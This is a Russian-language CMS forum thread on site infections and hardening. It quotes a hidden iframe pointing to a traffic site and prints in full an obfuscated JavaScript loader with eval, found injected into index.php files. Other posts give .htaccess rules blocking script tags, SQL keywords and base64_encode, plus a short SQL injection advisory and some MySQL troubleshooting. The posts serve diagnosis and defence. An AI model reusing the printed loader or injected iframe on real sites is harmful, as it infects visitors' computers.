| Автор | Сообщение |
Amro  |
№: 12579 Дата: 24.05.07 22:15 GMT
|
 Программист  Сообщений: 481 Откуда: Russia Astrakhan Кто: Кто я? Кто я? Злыдень я писюкатый : ) Возраст: 24  |
|
 |
|
| Sergey |
№: 12588 Дата: 25.05.07 21:03 GMT
|
Участник  Сообщений: 83 Откуда: Кто: Возраст: |
Вот такое письмо получил от провайдера:
...."Обычно это вирусы семейства Downloader.JS.*, распространяющие себя через веб-сайты. Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя. После этого он начинает отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код, например, такой: iframe src='http://trafficservice.cc/in.cgi?default' width='1' height='1' style='visibility: hidden;'/iframe ".... проверил, действительно, в конце файла index.php это было добавлено. Что интересно, больше 3-х месяцев не лазил (проверил и копию сайта - там нету). Провайдер так и написал, что: "Обращаем внимание, что в интернете можно встретить обсуждение данной проблемы, где в качестве причин заражения указываются различные бесплатные "движки" (phpBB и т.д.), либо наличие уязвимостей у хостинг-провайдеров. Со своей стороны можем заверить, что вирус распространяется только способом, описанным в этом письме, и его появление не связано с проблемами безопасности на сервере." - а я и не лазил - следовательно, есть новая дырка, все подготовлено для атаки. Начал смотреть и другие сайты, и... начал находить похожие записи. |
|
|
|
| motor2hg |
№: 12589 Дата: 26.05.07 00:40 GMT
|
 Админ  Сообщений: 851 Откуда: Russia S-Petersburg Кто: Специалист по поиску внеземных цивилизаций. Возраст: 41 |
Если вы хотите познакомится с таким вирусом или подобным.
www.referatov.net-сайт рассадник вирусов! КАТЕГОРИЧЕСКИ ЗАПРЕЩЕНО ПОCЕЩЕНИЕ БЕЗ ВКЛЮЧЁННОГО СПАЙДЕРА ИЛИ ГУАРДА АНТИВИРУСНИКА!!!! |
|
|
|
| Antar |
№: 12786 Дата: 14.06.07 20:37 GMT
|
Программист Сообщений: 785 Откуда: Israel Кто: Math Возраст: |
# Provide safety - created by dvdbil www.seditio-tr.com
RewriteCond %{QUERY_STRING} (\"|%22).*(\>|%3E|<|%3C).* [NC] RewriteRule ^(.*)$ plug.php?e=overview [NC] RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC] RewriteRule ^(.*)$ plug.php?e=overview [NC] RewriteCond %{QUERY_STRING} (\;|\'|\"|\%22).*(union|insert|where|select|update|drop|md5|or|and|if).* [NC] RewriteRule ^(.*)$ plug.php?e=overview [NC] RewriteRule (,|;|<|>|'|`) plug.php?e=overview [NC] защита от взлома с помощью хтаксесс. Must have |
|
|
|
| Sergey |
№: 12794 Дата: 15.06.07 01:45 GMT
|
Участник Сообщений: 83 Откуда: Кто: Возраст: |
Спасибо.
Есть такой объект в DOM, history называется, так вот, зайдя на такой сайт, с соответствующим скриптом, вы неожиданно для себя, можете раздать свою историю посещения еще не закрытых, но важных для вас сайтов - у вас просто украдут пороли. Это я обнаружил совершенно случайно, изучая один малоизвестный метод DHTML, наткнувшись на применение его в скрипте взлома. Совет (чистите историю посещения) перед лазаньем куда не надо. |
|
|
|
| Альф |
№: 21799 Дата: 21.10.08 14:33 GMT
|
 Участник Сообщений: 386 Откуда: Russia Сочи Кто: В оккупации - был! Возраст: |
Эта срань прописывается во всех index.php (в моем случае заразило и сайт, и интернет-магазин в поддиректории)
Код: <script language=JavaScript> function zbn15(p) { var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,3,11,47,50,42,16,2,51,15,0,0,0,0,0,0,7,26,60,24,23,21,28,14,56,8,58,9,52,25,40,34,55,18,12,32,6,48,45,10,27,36,57,0,0,0,0,0,0,1,5,17,44,41,30,20,53,39,31,35,37,54,38,19,62,43,59,22,61,46,33,29,13,4,49);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(184^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}zbn15('9@VhFjt8suR8M8F82DHiBjVhw0ZSFjtmxDwPs8dl9qFLRPxYjQCLfqFmEPxnsiwhwDNO9JISfkZ4W3wvA7x8RkdSDfZkM8xPc8FLDXVlcXVPDjK8DfHiosjmR1VlWjw8s8xYhix86Xe4MXxPDDxYcWeO9mNO_TZYj5HkG7NPjGZiAOZ8c8x86DNOaJIn6PwLj1x8bTHOCuR8aowPb5KPc3R4giwU7AthsPVnTQHlcrV4MDwPTpMY')</script><!-- 81.177.16.130 --> В результате чего при обращении к сайту комп пытается заразится Bloodhound.Exploit.196 в терминологии Нортона, который вирус не пропустил в систему. |
|
|
|
| MeDBejoHok |
№: 21800 Дата: 21.10.08 15:48 GMT
|
 Скин-мейкер Сообщений: 596 Откуда: Belarus Кто: здесь? Возраст: 24 |
Цитата А чьо делает? Можно по-подробнее? |
|
|
|
| Alex300 |
№: 23033 Дата: 16.12.08 20:45 GMT
|
 Программист Сообщений: 68 Откуда: Russia Астрахань Кто: Программист Возраст: 30 |
А можно и усовершенствовать защиту. Ниже приведена с комментариями. Перевод, думаю излишен
Код: ########## Begin - Rewrite rules to block out some common exploits ## If you experience problems on your site block out the operations listed below ## This attempts to block the most common type of exploit # RewriteCond %{QUERY_STRING} (\"|%22).*(\>|%3E|<|%3C).* [NC,OR] # Block out any script that includes a <script> tag in URL RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (\;|\'|\"|\%22).*(union|insert|where|select|update|drop|md5|or|and|if).* [NC,OR] # Block out any script trying to set a PHP GLOBALS variable via URL RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] # Block out any script trying to modify a _REQUEST variable via URL RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR] # Block out any script trying to base64_encode crap to send via URL RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) RewriteRule ^(.*)$ plug.php?e=overview [NC] RewriteRule (,|;|<|>|'|`) plug.php?e=overview [NC] # ########## End - Rewrite rules to block out some common exploits Если хотите чтобы атакующего выбрасывало не на карту сайта, а скажем на 403 Forbidden, то строку Код: RewriteRule ^(.*)$ plug.php?e=overview [NC] следует заменить на Код: # Send all blocked request to homepage with 403 Forbidden error! RewriteRule ^(.*)$ index.php [F,L] Элементарные средства защиты желательно иметь добавлено спустя 2 мин. Цитата Оно пресекает некоторые атаки проводимые через URL - запрос. А именно, подмену глобальных переменных, передачи скриптов в качестве параметров, некоторых иньекций |
|
|
|
| Nafanya |
№: 23073 Дата: 18.12.08 23:28 GMT
|
 Участник Сообщений: 22 Откуда: Russia Кто: Возраст: |
Народ подскажите из-за чего такое может быть, захожу к себе на сайт и получаю вот это:
Код: Fatal error : SQL error : Table './nafanya_db/sed_auth' was created with a different version of MySQL and cannot be read До зтого ни чего не делал, последний раз заходил просто посмотрел ни чего не менял. Посмотрел в phpMyAdmin там в таблице sed_auth все поля (Записи, Тип, Размер) пустые. то есть в них вообще ни чего не написанно, а в поле Сравнение стоит in use. |
|
|
|
| Amro |
№: 23079 Дата: 19.12.08 09:42 GMT
|
Программист Сообщений: 481 Откуда: Russia Astrakhan Кто: Кто я? Кто я? Злыдень я писюкатый : ) Возраст: 24 |
Какая версия MySQL и не апгрейдили ли его случаем ? попробуй дамп этой таблицы сделать.
|
|
|
|
| Nafanya |
№: 23080 Дата: 19.12.08 09:55 GMT
|
Участник Сообщений: 22 Откуда: Russia Кто: Возраст: |
Версия MySQL 4.0.24. Нет ни каких апгрейдов не делал. В phpMyAdmin с этой таблицей вообще ни чего нельзя было сделать, пишет different version of MySQL. Правда удалить удалось. Я востоновил из бекапа эту таблицу вроде всё зарадотало. Только вот хотелось бы понять из за чего такое могло произойти.
|
|
|
|
| Amro |
№: 23082 Дата: 19.12.08 10:04 GMT
|
Программист Сообщений: 481 Откуда: Russia Astrakhan Кто: Кто я? Кто я? Злыдень я писюкатый : ) Возраст: 24 |
Древняя версия MySQL, поставь хотябы 4.1.22 или выше а ещё лучше 5-ую
|
|
|
|
| medar |
№: 23083 Дата: 19.12.08 11:21 GMT
|
 Участник Сообщений: 197 Откуда: Russia Москва Кто: делаю деньги Возраст: 34 |
Nafanya, в следующий раз попробуй cделать Repair table.
Похоже, просто mysql сглючил под нагрузкой. |
|
|
|
| Nafanya |
№: 23085 Дата: 19.12.08 12:19 GMT
|
Участник Сообщений: 22 Откуда: Russia Кто: Возраст: |
Цитата Похоже, просто сглючил так как нагрузки ни какой у меня нет, да и в логах ни чего подозрительного нет. |
|
|
|
| J_a_R |
№: 26009 Дата: 30.04.09 13:11 GMT
|
Участник Сообщений: 22 Откуда: Russia Кто: Возраст: |
|
|
|
|
| NovoKain |
№: 26016 Дата: 30.04.09 22:35 GMT
|
 Участник Сообщений: 405 Откуда: Russia Кто: Возраст: |
|
|
|
|
| Boss |
№: 26021 Дата: 02.05.09 20:13 GMT
|
 Участник Сообщений: 340 Откуда: Russia Кто: Boss Возраст: |
Там ведь фильтры. В частности для $w = sed_import('w','G','ALP',4);
|
|
|
|
| Maximov |
№: 26111 Дата: 10.05.09 22:30 GMT
|
Участник Сообщений: 1 Откуда: Ukraine Кто: Возраст: |
Уязвимость в плагине Seditio Events
Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "c" в сценарии events/inc/events.inc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. |
|
|
|
| gari46 |
№: 28108 Дата: 04.02.10 18:20 GMT
|
 Участник Сообщений: 45 Откуда: Ukraine yalta Кто: я где я кто эти люди Возраст: 21 |
Что означают записи в логах ? A variable type check failed, expecting G/ALP for 'm' : register/ - /users.php?m=register/
|
|
|
|
| Aza |
№: 28115 Дата: 05.02.10 17:33 GMT
|
 Идеолог Сообщений: 1261 Откуда: Russia Иркутск Кто: Возраст: 34 |
Возможно при регистрации юзер не правильно вбил пароль во второе поле (отличный от первого). Система заблокировала регистрацию.
|
|
|
|